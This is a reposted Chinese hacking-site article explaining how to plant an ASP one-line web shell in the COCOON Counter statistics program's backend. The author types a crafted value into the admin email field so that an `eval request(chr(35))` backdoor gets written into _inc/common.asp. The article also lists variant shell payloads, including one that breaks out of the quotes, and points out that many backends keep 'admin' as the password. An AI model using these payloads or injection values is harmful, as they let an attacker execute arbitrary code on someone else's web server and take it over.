 |
COCOON Counter统计程序后台写马漏洞 |
|
|
| COCOON Counter统计程序后台写马漏洞 |
|
| 作者:佚名 文章来源:不详 点击数: 更新时间:2007-1-25 11:11:42 |
|
引用最新海洋顶端eval版中的几句话,这里要用到的是<%eval request(chr(35))%>,
"evalExecutePP.htm的文本框里自己写的代码就是添用2006X2.exe转换后生成的那个html文本框里的代码。什么是文本框大家知道吧?不知的就去查查html吧。这样添好了,就可以用自己的做的c端了。如果不会,你就用我的那个现成的“2006c端的例子.htm”吧。
S端是<%eval(request("#"))%>或<%eval request("#")%>或<%eval request(chr(35))%>等等,或不用%,自己变形吧,不多说了"
偶在本地架设了一个环境,实际操作中不能写错否则后悔就来不急了,在管理信箱那把cnhacker at 263 dot net":eval request(chr(35))//复制过去,,点击保存,看下_inc/common.asp的内容
WebMasterEmail = "cnhacker at 263 dot net/":eval request(chr(35))//"嘿嘿来执行下,嘿嘿!成功了,统计程序中的后台拿将"转义成了/"所以这用了evalrequest(chr(35))嘿嘿,//是注释,:在asp中就是换行,前提就是你能进到后台,(好多后台管理密码都是admin嘿嘿)php也可以这样的嘿嘿,而且比asp利用的地方更多!需要动下配置语句的前后搭配好,利用好一些符号。
另注:本来不想这么早发出来的,今天看了黑防8期也提到了类似方法这里就贴出来,黑防中的代码可以写成9xiao"%><%eval request(chr(35))%><%’,这个方法也比较巧妙,//和’在asp都是注释语句!此统计程序还有暴库的地方这个就不公布了!
【转自世纪安全网 http://www.21safe.com】
|
|
| 文章录入:admin 责任编辑:admin |
|
|
上一篇文章: Mambo com_content远程SQL注入漏洞
下一篇文章: 如何在Internet Explorer以使用 FTP PORT 和 FTP PASV 两种模式 |
|
|
| 【字体:小 大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】 |
|
|
 网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!) |
|
|
|
|
|
